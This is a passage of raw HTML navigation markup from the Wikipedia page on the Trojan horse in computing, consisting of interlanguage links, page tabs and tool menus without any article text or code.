href="https://es.wikipedia.org/wiki/Troyano_(inform%C3%A1tica)" title="Troyano (informática) – Spanish" lang="es" hreflang="es" data-title="Troyano (informática)" data-language-autonym="Español" data-language-local-name="Spanish" class="interlanguage-link-target"><span>Español</span></a></li><li class="interlanguage-link interwiki-eo mw-list-item"><a href="https://eo.wikipedia.org/wiki/Troja_%C4%89evalo_(komputiko)" title="Troja ĉevalo (komputiko) – Esperanto" lang="eo" hreflang="eo" data-title="Troja ĉevalo (komputiko)" data-language-autonym="Esperanto" data-language-local-name="Esperanto" class="interlanguage-link-target"><span>Esperanto</span></a></li><li class="interlanguage-link interwiki-eu mw-list-item"><a href="https://eu.wikipedia.org/wiki/Troiatar" title="Troiatar – Basque" lang="eu" hreflang="eu" data-title="Troiatar" data-language-autonym="Euskara" data-language-local-name="Basque" class="interlanguage-link-target"><span>Euskara</span></a></li><li class="interlanguage-link interwiki-fa mw-list-item"><a href="https://fa.wikipedia.org/wiki/%D8%A7%D8%B3%D8%A8_%D8%AA%D8%B1%D9%88%D8%A2_(%D8%B1%D8%A7%DB%8C%D8%A7%D9%86%D8%B4)" title="اسب تروآ (رایانش) – Persian" lang="fa" hreflang="fa" data-title="اسب تروآ (رایانش)" data-language-autonym="فارسی" data-language-local-name="Persian" class="interlanguage-link-target"><span>فارسی</span></a></li><li class="interlanguage-link interwiki-fr mw-list-item"><a href="https://fr.wikipedia.org/wiki/Cheval_de_Troie_(informatique)" title="Cheval de Troie (informatique) – French" lang="fr" hreflang="fr" data-title="Cheval de Troie (informatique)" data-language-autonym="Français" data-language-local-name="French" class="interlanguage-link-target"><span>Français</span></a></li><li class="interlanguage-link interwiki-gl mw-list-item"><a href="https://gl.wikipedia.org/wiki/Cabalo_de_Troia_(inform%C3%A1tica)" title="Cabalo de Troia (informática) – Galician" lang="gl" hreflang="gl" data-title="Cabalo de Troia (informática)" data-language-autonym="Galego" data-language-local-name="Galician" class="interlanguage-link-target"><span>Galego</span></a></li><li class="interlanguage-link interwiki-gu mw-list-item"><a href="https://gu.wikipedia.org/wiki/%E0%AA%9F%E0%AB%8D%E0%AA%B0%E0%AB%8B%E0%AA%9C%E0%AA%A8_%E0%AA%B9%E0%AB%8B%E0%AA%B0%E0%AB%8D%E0%AA%B8_(%E0%AA%95%E0%AA%AE%E0%AB%8D%E0%AA%AA%E0%AB%8D%E0%AA%AF%E0%AB%81%E0%AA%9F%E0%AA%BF%E0%AA%82%E0%AA%97)" title="ટ્રોજન હોર્સ (કમ્પ્યુટિંગ) – Gujarati" lang="gu" hreflang="gu" data-title="ટ્રોજન હોર્સ (કમ્પ્યુટિંગ)" data-language-autonym="ગુજરાતી" data-language-local-name="Gujarati" class="interlanguage-link-target"><span>ગુજરાતી</span></a></li><li class="interlanguage-link interwiki-ko mw-list-item"><a href="https://ko.wikipedia.org/wiki/%ED%8A%B8%EB%A1%9C%EC%9D%B4_%EB%AA%A9%EB%A7%88_(%EC%BB%B4%ED%93%A8%ED%8C%85)" title="트로이 목마 (컴퓨팅) – Korean" lang="ko" hreflang="ko" data-title="트로이 목마 (컴퓨팅)" data-language-autonym="한국어" data-language-local-name="Korean" class="interlanguage-link-target"><span>한국어</span></a></li><li class="interlanguage-link interwiki-hi mw-list-item"><a href="https://hi.wikipedia.org/wiki/%E0%A4%9F%E0%A5%8D%E0%A4%B0%E0%A5%8B%E0%A4%9C%E0%A4%A8_%E0%A4%B9%E0%A5%89%E0%A4%B0%E0%A5%8D%E0%A4%B8_(%E0%A4%95%E0%A4%AE%E0%A5%8D%E0%A4%AA%E0%A5%8D%E0%A4%AF%E0%A5%82%E0%A4%9F%E0%A4%BF%E0%A4%82%E0%A4%97)" title="ट्रोजन हॉर्स (कम्प्यूटिंग) – Hindi" lang="hi" hreflang="hi" data-title="ट्रोजन हॉर्स (कम्प्यूटिंग)" data-language-autonym="हिन्दी" data-language-local-name="Hindi" class="interlanguage-link-target"><span>हिन्दी</span></a></li><li class="interlanguage-link interwiki-hr mw-list-item"><a href="https://hr.wikipedia.org/wiki/Trojanski_konj_(softver)" title="Trojanski konj (softver) – Croatian" lang="hr" hreflang="hr" data-title="Trojanski konj (softver)" data-language-autonym="Hrvatski" data-language-local-name="Croatian" class="interlanguage-link-target"><span>Hrvatski</span></a></li><li class="interlanguage-link interwiki-id mw-list-item"><a href="https://id.wikipedia.org/wiki/Trojan_horse_(komputer)" title="Trojan horse (komputer) – Indonesian" lang="id" hreflang="id" data-title="Trojan horse (komputer)" data-language-autonym="Bahasa Indonesia" data-language-local-name="Indonesian" class="interlanguage-link-target"><span>Bahasa Indonesia</span></a></li><li class="interlanguage-link interwiki-it mw-list-item"><a href="https://it.wikipedia.org/wiki/Trojan_(informatica)" title="Trojan (informatica) – Italian" lang="it" hreflang="it" data-title="Trojan (informatica)" data-language-autonym="Italiano" data-language-local-name="Italian" class="interlanguage-link-target"><span>Italiano</span></a></li><li class="interlanguage-link interwiki-he mw-list-item"><a href="https://he.wikipedia.org/wiki/%D7%A1%D7%95%D7%A1_%D7%98%D7%A8%D7%95%D7%99%D7%90%D7%A0%D7%99_(%D7%AA%D7%95%D7%9B%D7%A0%D7%94)" title="סוס טרויאני (תוכנה) – Hebrew" lang="he" hreflang="he" data-title="סוס טרויאני (תוכנה)" data-language-autonym="עברית" data-language-local-name="Hebrew" class="interlanguage-link-target"><span>עברית</span></a></li><li class="interlanguage-link interwiki-jv mw-list-item"><a href="https://jv.wikipedia.org/wiki/Trojan" title="Trojan – Javanese" lang="jv" hreflang="jv" data-title="Trojan" data-language-autonym="Jawa" data-language-local-name="Javanese" class="interlanguage-link-target"><span>Jawa</span></a></li><li class="interlanguage-link interwiki-ka mw-list-item"><a href="https://ka.wikipedia.org/wiki/%E1%83%A2%E1%83%A0%E1%83%9D%E1%83%98%E1%83%90%E1%83%9C%E1%83%98" title="ტროიანი – Georgian" lang="ka" hreflang="ka" data-title="ტროიანი" data-language-autonym="ქართული" data-language-local-name="Georgian" class="interlanguage-link-target"><span>ქართული</span></a></li><li class="interlanguage-link interwiki-la mw-list-item"><a href="https://la.wikipedia.org/wiki/Equus_Troianus_(informaticum)" title="Equus Troianus (informaticum) – Latin" lang="la" hreflang="la" data-title="Equus Troianus (informaticum)" data-language-autonym="Latina" data-language-local-name="Latin" class="interlanguage-link-target"><span>Latina</span></a></li><li class="interlanguage-link interwiki-lv mw-list-item"><a href="https://lv.wikipedia.org/wiki/Trojas_zirgs_(datorika)" title="Trojas zirgs (datorika) – Latvian" lang="lv" hreflang="lv" data-title="Trojas zirgs (datorika)" data-language-autonym="Latviešu" data-language-local-name="Latvian" class="interlanguage-link-target"><span>Latviešu</span></a></li><li class="interlanguage-link interwiki-lt mw-list-item"><a href="https://lt.wikipedia.org/wiki/Trojos_arklys_(programa)" title="Trojos arklys (programa) – Lithuanian" lang="lt" hreflang="lt" data-title="Trojos arklys (programa)" data-language-autonym="Lietuvių" data-language-local-name="Lithuanian" class="interlanguage-link-target"><span>Lietuvių</span></a></li><li class="interlanguage-link interwiki-lmo mw-list-item"><a href="https://lmo.wikipedia.org/wiki/Cavall_de_Troja_(informatega)" title="Cavall de Troja (informatega) – Lombard" lang="lmo" hreflang="lmo" data-title="Cavall de Troja (informatega)" data-language-autonym="Lombard" data-language-local-name="Lombard" class="interlanguage-link-target"><span>Lombard</span></a></li><li class="interlanguage-link interwiki-hu mw-list-item"><a href="https://hu.wikipedia.org/wiki/Tr%C3%B3jai_program" title="Trójai program – Hungarian" lang="hu" hreflang="hu" data-title="Trójai program" data-language-autonym="Magyar" data-language-local-name="Hungarian" class="interlanguage-link-target"><span>Magyar</span></a></li><li class="interlanguage-link interwiki-ml mw-list-item"><a href="https://ml.wikipedia.org/wiki/%E0%B4%9F%E0%B5%8D%E0%B4%B0%E0%B5%8B%E0%B4%9C%E0%B5%BB_%E0%B4%95%E0%B5%81%E0%B4%A4%E0%B4%BF%E0%B4%B0_(%E0%B4%95%E0%B4%AE%E0%B5%8D%E0%B4%AA%E0%B5%8D%E0%B4%AF%E0%B5%82%E0%B4%9F%E0%B5%8D%E0%B4%9F%E0%B5%BC)" title="ട്രോജൻ കുതിര (കമ്പ്യൂട്ടർ) – Malayalam" lang="ml" hreflang="ml" data-title="ട്രോജൻ കുതിര (കമ്പ്യൂട്ടർ)" data-language-autonym="മലയാളം" data-language-local-name="Malayalam" class="interlanguage-link-target"><span>മലയാളം</span></a></li><li class="interlanguage-link interwiki-ms mw-list-item"><a href="https://ms.wikipedia.org/wiki/Kuda_Troia_(komputer)" title="Kuda Troia (komputer) – Malay" lang="ms" hreflang="ms" data-title="Kuda Troia (komputer)" data-language-autonym="Bahasa Melayu" data-language-local-name="Malay" class="interlanguage-link-target"><span>Bahasa Melayu</span></a></li><li class="interlanguage-link interwiki-mn mw-list-item"><a href="https://mn.wikipedia.org/wiki/%D0%A2%D1%80%D0%BE%D1%8F%D0%BD%D1%8B_%D0%BC%D0%BE%D1%80%D1%8C" title="Трояны морь – Mongolian" lang="mn" hreflang="mn" data-title="Трояны морь" data-language-autonym="Монгол" data-language-local-name="Mongolian" class="interlanguage-link-target"><span>Монгол</span></a></li><li class="interlanguage-link interwiki-my mw-list-item"><a href="https://my.wikipedia.org/wiki/%E1%80%91%E1%80%9B%E1%80%AD%E1%80%AF%E1%80%82%E1%80%BB%E1%80%94%E1%80%BA_(%E1%80%80%E1%80%BD%E1%80%94%E1%80%BA%E1%80%95%E1%80%BB%E1%80%B0%E1%80%90%E1%80%AC)" title="ထရိုဂျန် (ကွန်ပျူတာ) – Burmese" lang="my" hreflang="my" data-title="ထရိုဂျန် (ကွန်ပျူတာ)" data-language-autonym="မြန်မာဘာသာ" data-language-local-name="Burmese" class="interlanguage-link-target"><span>မြန်မာဘာသာ</span></a></li><li class="interlanguage-link interwiki-nl mw-list-item"><a href="https://nl.wikipedia.org/wiki/Trojaans_paard_(computers)" title="Trojaans paard (computers) – Dutch" lang="nl" hreflang="nl" data-title="Trojaans paard (computers)" data-language-autonym="Nederlands" data-language-local-name="Dutch" class="interlanguage-link-target"><span>Nederlands</span></a></li><li class="interlanguage-link interwiki-ja mw-list-item"><a href="https://ja.wikipedia.org/wiki/%E3%83%88%E3%83%AD%E3%82%A4%E3%81%AE%E6%9C%A8%E9%A6%AC_(%E3%82%BD%E3%83%95%E3%83%88%E3%82%A6%E3%82%A7%E3%82%A2)" title="トロイの木馬 (ソフトウェア) – Japanese" lang="ja" hreflang="ja" data-title="トロイの木馬 (ソフトウェア)" data-language-autonym="日本語" data-language-local-name="Japanese" class="interlanguage-link-target"><span>日本語</span></a></li><li class="interlanguage-link interwiki-no mw-list-item"><a href="https://no.wikipedia.org/wiki/Trojansk_hest" title="Trojansk hest – Norwegian Bokmål" lang="nb" hreflang="nb" data-title="Trojansk hest" data-language-autonym="Norsk bokmål" data-language-local-name="Norwegian Bokmål" class="interlanguage-link-target"><span>Norsk bokmål</span></a></li><li class="interlanguage-link interwiki-nn mw-list-item"><a href="https://nn.wikipedia.org/wiki/Trojansk_hest" title="Trojansk hest – Norwegian Nynorsk" lang="nn" hreflang="nn" data-title="Trojansk hest" data-language-autonym="Norsk nynorsk" data-language-local-name="Norwegian Nynorsk" class="interlanguage-link-target"><span>Norsk nynorsk</span></a></li><li class="interlanguage-link interwiki-uz mw-list-item"><a href="https://uz.wikipedia.org/wiki/Troya_oti_(kompyuter_virusi)" title="Troya oti (kompyuter virusi) – Uzbek" lang="uz" hreflang="uz" data-title="Troya oti (kompyuter virusi)" data-language-autonym="Oʻzbekcha / ўзбекча" data-language-local-name="Uzbek" class="interlanguage-link-target"><span>Oʻzbekcha / ўзбекча</span></a></li><li class="interlanguage-link interwiki-pa mw-list-item"><a href="https://pa.wikipedia.org/wiki/%E0%A8%9F%E0%A8%B0%E0%A9%8B%E0%A8%9C%E0%A8%A8_%E0%A8%B9%E0%A8%BE%E0%A8%B0%E0%A8%B8_(%E0%A8%B5%E0%A8%BE%E0%A8%87%E0%A8%B0%E0%A8%B8)" title="ਟਰੋਜਨ ਹਾਰਸ (ਵਾਇਰਸ) – Punjabi" lang="pa" hreflang="pa" data-title="ਟਰੋਜਨ ਹਾਰਸ (ਵਾਇਰਸ)" data-language-autonym="ਪੰਜਾਬੀ" data-language-local-name="Punjabi" class="interlanguage-link-target"><span>ਪੰਜਾਬੀ</span></a></li><li class="interlanguage-link interwiki-pl mw-list-item"><a href="https://pl.wikipedia.org/wiki/Ko%C5%84_troja%C5%84ski_(informatyka)" title="Koń trojański (informatyka) – Polish" lang="pl" hreflang="pl" data-title="Koń trojański (informatyka)" data-language-autonym="Polski" data-language-local-name="Polish" class="interlanguage-link-target"><span>Polski</span></a></li><li class="interlanguage-link interwiki-pt mw-list-item"><a href="https://pt.wikipedia.org/wiki/Cavalo_de_troia_(computa%C3%A7%C3%A3o)" title="Cavalo de troia (computação) – Portuguese" lang="pt" hreflang="pt" data-title="Cavalo de troia (computação)" data-language-autonym="Português" data-language-local-name="Portuguese" class="interlanguage-link-target"><span>Português</span></a></li><li class="interlanguage-link interwiki-ro mw-list-item"><a href="https://ro.wikipedia.org/wiki/Cal_troian_(informatic%C4%83)" title="Cal troian (informatică) – Romanian" lang="ro" hreflang="ro" data-title="Cal troian (informatică)" data-language-autonym="Română" data-language-local-name="Romanian" class="interlanguage-link-target"><span>Română</span></a></li><li class="interlanguage-link interwiki-ru mw-list-item"><a href="https://ru.wikipedia.org/wiki/%D0%A2%D1%80%D0%BE%D1%8F%D0%BD%D1%81%D0%BA%D0%B0%D1%8F_%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B0" title="Троянская программа – Russian" lang="ru" hreflang="ru" data-title="Троянская программа" data-language-autonym="Русский" data-language-local-name="Russian" class="interlanguage-link-target"><span>Русский</span></a></li><li class="interlanguage-link interwiki-sq mw-list-item"><a href="https://sq.wikipedia.org/wiki/Kali_i_Troj%C3%ABs_(informatik%C3%AB)" title="Kali i Trojës (informatikë) – Albanian" lang="sq" hreflang="sq" data-title="Kali i Trojës (informatikë)" data-language-autonym="Shqip" data-language-local-name="Albanian" class="interlanguage-link-target"><span>Shqip</span></a></li><li class="interlanguage-link interwiki-simple mw-list-item"><a href="https://simple.wikipedia.org/wiki/Trojan_horse_(computing)" title="Trojan horse (computing) – Simple English" lang="en-simple" hreflang="en-simple" data-title="Trojan horse (computing)" data-language-autonym="Simple English" data-language-local-name="Simple English" class="interlanguage-link-target"><span>Simple English</span></a></li><li class="interlanguage-link interwiki-sk mw-list-item"><a href="https://sk.wikipedia.org/wiki/Tr%C3%B3jsky_k%C3%B4%C5%88_(informatika)" title="Trójsky kôň (informatika) – Slovak" lang="sk" hreflang="sk" data-title="Trójsky kôň (informatika)" data-language-autonym="Slovenčina" data-language-local-name="Slovak" class="interlanguage-link-target"><span>Slovenčina</span></a></li><li class="interlanguage-link interwiki-sl mw-list-item"><a href="https://sl.wikipedia.org/wiki/Trojanski_konj_(ra%C4%8Dunalni%C5%A1tvo)" title="Trojanski konj (računalništvo) – Slovenian" lang="sl" hreflang="sl" data-title="Trojanski konj (računalništvo)" data-language-autonym="Slovenščina" data-language-local-name="Slovenian" class="interlanguage-link-target"><span>Slovenščina</span></a></li><li class="interlanguage-link interwiki-ckb mw-list-item"><a href="https://ckb.wikipedia.org/wiki/%D8%A6%DB%95%D8%B3%D9%BE%DB%8C_%D8%AA%DB%95%D8%B1%D9%88%D8%A7%D8%AF%DB%95" title="ئەسپی تەروادە – Central Kurdish" lang="ckb" hreflang="ckb" data-title="ئەسپی تەروادە" data-language-autonym="کوردی" data-language-local-name="Central Kurdish" class="interlanguage-link-target"><span>کوردی</span></a></li><li class="interlanguage-link interwiki-sr mw-list-item"><a href="https://sr.wikipedia.org/wiki/%D0%A2%D1%80%D0%BE%D1%98%D0%B0%D0%BD%D1%81%D0%BA%D0%B8_%D0%BA%D0%BE%D1%9A_(%D0%B8%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0)" title="Тројански коњ (информатика) – Serbian" lang="sr" hreflang="sr" data-title="Тројански коњ (информатика)" data-language-autonym="Српски / srpski" data-language-local-name="Serbian" class="interlanguage-link-target"><span>Српски / srpski</span></a></li><li class="interlanguage-link interwiki-sh mw-list-item"><a href="https://sh.wikipedia.org/wiki/Trojanski_konj_(informatika)" title="Trojanski konj (informatika) – Serbo-Croatian" lang="sh" hreflang="sh" data-title="Trojanski konj (informatika)" data-language-autonym="Srpskohrvatski / српскохрватски" data-language-local-name="Serbo-Croatian" class="interlanguage-link-target"><span>Srpskohrvatski / српскохрватски</span></a></li><li class="interlanguage-link interwiki-fi mw-list-item"><a href="https://fi.wikipedia.org/wiki/Troijalainen_(tietotekniikka)" title="Troijalainen (tietotekniikka) – Finnish" lang="fi" hreflang="fi" data-title="Troijalainen (tietotekniikka)" data-language-autonym="Suomi" data-language-local-name="Finnish" class="interlanguage-link-target"><span>Suomi</span></a></li><li class="interlanguage-link interwiki-sv mw-list-item"><a href="https://sv.wikipedia.org/wiki/Trojan_(datorprogram)" title="Trojan (datorprogram) – Swedish" lang="sv" hreflang="sv" data-title="Trojan (datorprogram)" data-language-autonym="Svenska" data-language-local-name="Swedish" class="interlanguage-link-target"><span>Svenska</span></a></li><li class="interlanguage-link interwiki-tl mw-list-item"><a href="https://tl.wikipedia.org/wiki/Kabayong_Troyano_(kompyuter)" title="Kabayong Troyano (kompyuter) – Tagalog" lang="tl" hreflang="tl" data-title="Kabayong Troyano (kompyuter)" data-language-autonym="Tagalog" data-language-local-name="Tagalog" class="interlanguage-link-target"><span>Tagalog</span></a></li><li class="interlanguage-link interwiki-ta mw-list-item"><a href="https://ta.wikipedia.org/wiki/%E0%AE%A4%E0%AE%BF%E0%AE%B0%E0%AE%BE%E0%AE%AF%E0%AE%A9%E0%AF%8D_%E0%AE%95%E0%AF%81%E0%AE%A4%E0%AE%BF%E0%AE%B0%E0%AF%88_(%E0%AE%95%E0%AE%A3%E0%AE%BF%E0%AE%A9%E0%AE%BF)" title="திராயன் குதிரை (கணினி) – Tamil" lang="ta" hreflang="ta" data-title="திராயன் குதிரை (கணினி)" data-language-autonym="தமிழ்" data-language-local-name="Tamil" class="interlanguage-link-target"><span>தமிழ்</span></a></li><li class="interlanguage-link interwiki-th mw-list-item"><a href="https://th.wikipedia.org/wiki/%E0%B8%A1%E0%B9%89%E0%B8%B2%E0%B9%82%E0%B8%97%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%99_(%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C)" title="ม้าโทรจัน (คอมพิวเตอร์) – Thai" lang="th" hreflang="th" data-title="ม้าโทรจัน (คอมพิวเตอร์)" data-language-autonym="ไทย" data-language-local-name="Thai" class="interlanguage-link-target"><span>ไทย</span></a></li><li class="interlanguage-link interwiki-tg mw-list-item"><a href="https://tg.wikipedia.org/wiki/%D0%91%D0%B0%D1%80%D0%BD%D0%BE%D0%BC%D0%B0%D0%B8_%D0%B2%D0%B8%D1%80%D1%83%D1%81%D0%B8%D0%B8_%D1%82%D1%80%D0%BE%D1%8F%D0%BD%D3%A3" title="Барномаи вирусии троянӣ – Tajik" lang="tg" hreflang="tg" data-title="Барномаи вирусии троянӣ" data-language-autonym="Тоҷикӣ" data-language-local-name="Tajik" class="interlanguage-link-target"><span>Тоҷикӣ</span></a></li><li class="interlanguage-link interwiki-tr mw-list-item"><a href="https://tr.wikipedia.org/wiki/Truva_at%C4%B1_(bilgisayar)" title="Truva atı (bilgisayar) – Turkish" lang="tr" hreflang="tr" data-title="Truva atı (bilgisayar)" data-language-autonym="Türkçe" data-language-local-name="Turkish" class="interlanguage-link-target"><span>Türkçe</span></a></li><li class="interlanguage-link interwiki-uk mw-list-item"><a href="https://uk.wikipedia.org/wiki/%D0%A2%D1%80%D0%BE%D1%8F%D0%BD%D1%81%D1%8C%D0%BA%D0%B0_%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%B0" title="Троянська програма – Ukrainian" lang="uk" hreflang="uk" data-title="Троянська програма" data-language-autonym="Українська" data-language-local-name="Ukrainian" class="interlanguage-link-target"><span>Українська</span></a></li><li class="interlanguage-link interwiki-vi mw-list-item"><a href="https://vi.wikipedia.org/wiki/Trojan_(m%C3%A1y_t%C3%ADnh)" title="Trojan (máy tính) – Vietnamese" lang="vi" hreflang="vi" data-title="Trojan (máy tính)" data-language-autonym="Tiếng Việt" data-language-local-name="Vietnamese" class="interlanguage-link-target"><span>Tiếng Việt</span></a></li><li class="interlanguage-link interwiki-wuu mw-list-item"><a href="https://wuu.wikipedia.org/wiki/%E7%89%B9%E6%B4%9B%E4%BC%8A%E6%9C%A8%E9%A9%AC%EF%BC%88%E7%94%B5%E8%84%91%EF%BC%89" title="特洛伊木马(电脑) – Wu" lang="wuu" hreflang="wuu" data-title="特洛伊木马(电脑)" data-language-autonym="吴语" data-language-local-name="Wu" class="interlanguage-link-target"><span>吴语</span></a></li><li class="interlanguage-link interwiki-zh-yue mw-list-item"><a href="https://zh-yue.wikipedia.org/wiki/%E7%89%B9%E6%B4%9B%E4%BC%8A%E6%9C%A8%E9%A6%AC%E7%A8%8B%E5%BC%8F" title="特洛伊木馬程式 – Cantonese" lang="yue" hreflang="yue" data-title="特洛伊木馬程式" data-language-autonym="粵語" data-language-local-name="Cantonese" class="interlanguage-link-target"><span>粵語</span></a></li><li class="interlanguage-link interwiki-zh mw-list-item"><a href="https://zh.wikipedia.org/wiki/%E7%89%B9%E6%B4%9B%E4%BC%8A%E6%9C%A8%E9%A9%AC_(%E7%94%B5%E8%84%91)" title="特洛伊木马 (电脑) – Chinese" lang="zh" hreflang="zh" data-title="特洛伊木马 (电脑)" data-language-autonym="中文" data-language-local-name="Chinese" class="interlanguage-link-target"><span>中文</span></a></li> </ul> <div class="after-portlet after-portlet-lang"><span class="wb-langlinks-edit wb-langlinks-link"><a href="https://www.wikidata.org/wiki/Special:EntityPage/Q14639#sitelinks-wikipedia" title="Edit interlanguage links" class="wbc-editpage">Edit links</a></span></div> </div> </div> </div> </header> <div class="vector-page-toolbar"> <div class="vector-page-toolbar-container"> <div id="left-navigation"> <nav aria-label="Namespaces"> <div id="p-associated-pages" class="vector-menu vector-menu-tabs mw-portlet mw-portlet-associated-pages" > <div class="vector-menu-content"> <ul class="vector-menu-content-list"> <li id="ca-nstab-main" class="selected vector-tab-noicon mw-list-item"><a href="/wiki/Trojan_horse_(computing)" title="View the content page [c]" accesskey="c"><span>Article</span></a></li><li id="ca-talk" class="vector-tab-noicon mw-list-item"><a href="/wiki/Talk:Trojan_horse_(computing)" rel="discussion" title="Discuss improvements to the content page [t]" accesskey="t"><span>Talk</span></a></li> </ul> </div> </div> <div id="vector-variants-dropdown" class="vector-dropdown emptyPortlet" > <input type="checkbox" id="vector-variants-dropdown-checkbox" role="button" aria-haspopup="true" data-event-name="ui.dropdown-vector-variants-dropdown" class="vector-dropdown-checkbox " aria-label="Change language variant" > <label id="vector-variants-dropdown-label" for="vector-variants-dropdown-checkbox" class="vector-dropdown-label cdx-button cdx-button--fake-button cdx-button--fake-button--enabled cdx-button--weight-quiet" aria-hidden="true" ><span class="vector-dropdown-label-text">English</span> </label> <div class="vector-dropdown-content"> <div id="p-variants" class="vector-menu mw-portlet mw-portlet-variants emptyPortlet" > <div class="vector-menu-content"> <ul class="vector-menu-content-list"> </ul> </div> </div> </div> </div> </nav> </div> <div id="right-navigation" class="vector-collapsible"> <nav aria-label="Views"> <div id="p-views" class="vector-menu vector-menu-tabs mw-portlet mw-portlet-views" > <div class="vector-menu-content"> <ul class="vector-menu-content-list"> <li id="ca-view" class="selected vector-tab-noicon mw-list-item"><a href="/wiki/Trojan_horse_(computing)"><span>Read</span></a></li><li id="ca-edit" class="vector-tab-noicon mw-list-item"><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit" title="Edit this page [e]" accesskey="e"><span>Edit</span></a></li><li id="ca-history" class="vector-tab-noicon mw-list-item"><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=history" title="Past revisions of this page [h]" accesskey="h"><span>View history</span></a></li> </ul> </div> </div> </nav> <nav class="vector-page-tools-landmark" aria-label="Page tools"> <div id="vector-page-tools-dropdown" class="vector-dropdown vector-page-tools-dropdown" > <input type="checkbox" id="vector-page-tools-dropdown-checkbox" role="button" aria-haspopup="true" data-event-name="ui.dropdown-vector-page-tools-dropdown" class="vector-dropdown-checkbox " aria-label="Tools" > <label id="vector-page-tools-dropdown-label" for="vector-page-tools-dropdown-checkbox" class="vector-dropdown-label cdx-button cdx-button--fake-button cdx-button--fake-button--enabled cdx-button--weight-quiet" aria-hidden="true" ><span class="vector-dropdown-label-text">Tools</span> </label> <div class="vector-dropdown-content"> <div id="vector-page-tools-unpinned-container" class="vector-unpinned-container"> <div id="vector-page-tools" class="vector-page-tools vector-pinnable-element"> <div class="vector-pinnable-header vector-page-tools-pinnable-header vector-pinnable-header-unpinned" data-feature-name="page-tools-pinned" data-pinnable-element-id="vector-page-tools" data-pinned-container-id="vector-page-tools-pinned-container" data-unpinned-container-id="vector-page-tools-unpinned-container" > <div class="vector-pinnable-header-label">Tools</div> <button class="vector-pinnable-header-toggle-button vector-pinnable-header-pin-button" data-event-name="pinnable-header.vector-page-tools.pin">move to sidebar</button> <button class="vector-pinnable-header-toggle-button vector-pinnable-header-unpin-button" data-event-name="pinnable-header.vector-page-tools.unpin">hide</button> </div> <div id="p-cactions" class="vector-menu mw-portlet mw-portlet-cactions emptyPortlet vector-has-collapsible-items" title="More options" > <div class="vector-menu-heading"> Actions </div> <div class="vector-menu-content"> <ul class="vector-menu-content-list"> <li id="ca-more-view" class="selected vector-more-collapsible-item mw-list-item"><a href="/wiki/Trojan_horse_(computing)"><span>Read</span></a></li><li id="ca-more-edit" class="vector-more-collapsible-item mw-list-item"><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit" title="Edit this page [e]" accesskey="e"><span>Edit</span></a></li><li id="ca-more-history" class="vector-more-collapsible-item mw-list-item"><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=history"><span>View history</span></a></li> </ul> </div> </div> <div id="p-tb" class="vector-menu mw-portlet mw-portlet-tb" > <div class="vector-menu-heading"> General </div> <div class="vector-menu-content"> <ul class="vector-menu-content-list"> <li id="t-whatlinkshere" class="mw-list-item"><a href="/wiki/Special:WhatLinksHere/Trojan_horse_(computing)" title="List of all English Wikipedia pages containing links to this page [j]" accesskey="j"><span>What links here</span></a></li><li id="t-recentchangeslinked" class="mw-list-item"><a href="/wiki/Special:RecentChangesLinked/Trojan_horse_(computing)" rel="nofollow" title="Recent changes in pages linked from this page [k]" accesskey="k"><span>Related changes</span></a></li><li id="t-upload" class="mw-list-item"><a href="/wiki/Wikipedia:File_Upload_Wizard" title="Upload files [u]" accesskey="u"><span>Upload file</span></a></li><li id="t-specialpages" class="mw-list-item"><a href="/wiki/Special:SpecialPages" title="A list of all special pages [q]" accesskey="q"><span>Special pages</span></a></li><li id="t-permalink" class="mw-list-item"><a href="/w/index.php?title=Trojan_horse_(computing)&amp;oldid=1259654683" title="Permanent link to this revision of this page"><span>Permanent link</span></a></li><li id="t-info" class="mw-list-item"><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=info" title="More information about this page"><span>Page information</span></a></li><li id="t-cite" class="mw-list-item"><a href="/w/index.php?title=Special:CiteThisPage&amp;page=Trojan_horse_%28computing%29&amp;id=1259654683&amp;wpFormIdentifier=titleform" title="Information on how to cite this page"><span>Cite this page</span></a></li><li id="t-urlshortener" class="mw-list-item"><a href="/w/index.php?title=Special:UrlShortener&amp;url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FTrojan_horse_%28computing%29"><span>Get shortened URL</span></a></li><li id="t-urlshortener-qrcode" class="mw-list-item"><a href="/w/index.php?title=Special:QrCode&amp;url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FTrojan_horse_%28computing%29"><span>Download QR code</span></a></li> </ul> </div> </div> <div id="p-coll-print_export" class="vector-menu mw-portlet mw-portlet-coll-print_export" > <div class="vector-menu-heading"> Print/export </div> <div class="vector-menu-content"> <ul class="vector-menu-content-list"> <li id="coll-download-as-rl" class="mw-list-item"><a href="/w/index.php?title=Special:DownloadAsPdf&amp;page=Trojan_horse_%28computing%29&amp;action=show-download-screen" title="Download this page as a PDF file"><span>Download as PDF</span></a></li><li id="t-print" class="mw-list-item"><a href="/w/index.php?title=Trojan_horse_(computing)&amp;printable=yes" title="Printable version of this page [p]" accesskey="p"><span>Printable version</span></a></li> </ul> </div> </div> <div id="p-wikibase-otherprojects" class="vector-menu mw-portlet mw-portlet-wikibase-otherprojects" > <div class="vector-menu-heading"> In other projects </div> <div class="vector-menu-content"> <ul class="vector-menu-content-list"> <li class="wb-otherproject-link wb-otherproject-commons mw-list-item"><a href="https://commons.wikimedia.org/wiki/Category:Trojan_horse_(malware)" hreflang="en"><span>Wikimedia Commons</span></a></li><li id="t-wikibase" class="wb-otherproject-link wb-otherproject-wikibase-dataitem mw-list-item"><a href="https://www.wikidata.org/wiki/Special:EntityPage/Q14639" title="Structured data on this page hosted by Wikidata [g]" accesskey="g"><span>Wikidata item</span></a></li> </ul> </div> </div> </div> </div> </div> </div> </nav> </div> </div> </div> <div class="vector-column-end"> <div class="vector-sticky-pinned-container"> <nav class="vector-page-tools-landmark" aria-label="Page tools"> <div id="vector-page-tools-pinned-container" class="vector-pinned-container"> </div> </nav> <nav class="vector-appearance-landmark" aria-label="Appearance"> <div 